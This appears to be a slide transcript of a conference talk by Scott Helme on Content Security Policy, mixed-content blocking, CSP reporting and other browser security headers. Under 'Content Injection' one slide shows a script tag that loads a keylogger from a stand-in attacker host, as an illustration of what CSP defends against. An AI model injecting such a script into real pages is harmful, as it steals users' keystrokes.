d3ldn17 - recruiting the browser
TRANSCRIPT
Recruiting The Browser
@Scott_Helme |
scotthelme.co.uk
Scott Helme
How security has evolved
Browser support
Content Security Policy
Content Injection
<html>
<body>
<comment>
<script src=“evil.com/keylogger.js”></script>
</comment>
…
What is CSP?
cache-control: max-age=0, no-cache
content-encoding: gzip
content-security-policy: [policy goes here]
date: Tue, 17 Oct 2017 11:30:00
server: Incapsula
status: 200
child-src
connect-src
default-src
font-src
frame-src
CSP Directives
img-src
media-src
object-src
script-src
style-src
A basic policy
Content-Security-Policy: default-src ‘self’ example.com
Fine tuning
Content-Security-Policy: default-src ‘self’;
script-src ‘self’ cdnjs.cloudflare.com ajax.googleapis.com
<script src="https://ajax.googleapis.com/.../jquery.min.js">
</script>
<script src="https://cdnjs.cloudflare.com/.../bootstrap.min.js">
</script>
Fine tuning
Content-Security-Policy: default-src ‘self’;
script-src [source list];
style-src [source list];
img-src [source list];
frame-src [source list];
Mixed-Content
Mixed-Content
Mixed-Content
Mixed-Content
block-all-mixed-content
<img src=“http://imgur.com/Incapsula-D3.png”>
Mixed-Content
upgrade-insecure-
requests
<img src=“http://imgur.com/Incapsula-D3.png”>
Testing CSP
Content-Security-Policy-Report-Only: [policy]
Console:
Refused to load the script
‘https://code.jquery.com/jquery.1.11.3min.js’ because it violates the
following Content Security Policy directive: script-src
Testing CSP
Content-Security-Policy-Report-Only: [policy]
report-uri https://report-uri.io
{
"csp-report": {
"document-uri": "http://scotthelme.co.uk/blah/",
"violated-directive": "default-src https:",
”effective-directive": ”img-src",
"blocked-uri": "http://imgur.com" ...
Content-Security-PolicyContent-Security-Policy-Report-OnlyX-Webkit-Content-Security-PolicyX-Content-Security-Policy
Public-Key-PinsPublic-Key-Pins-Report-Only
Other Security Headers
Expect-Staple
Expect-CT
X-Xss-Protection
Secure all the things!
@Scott_Helme | scotthelme.co.uk
Scott Helme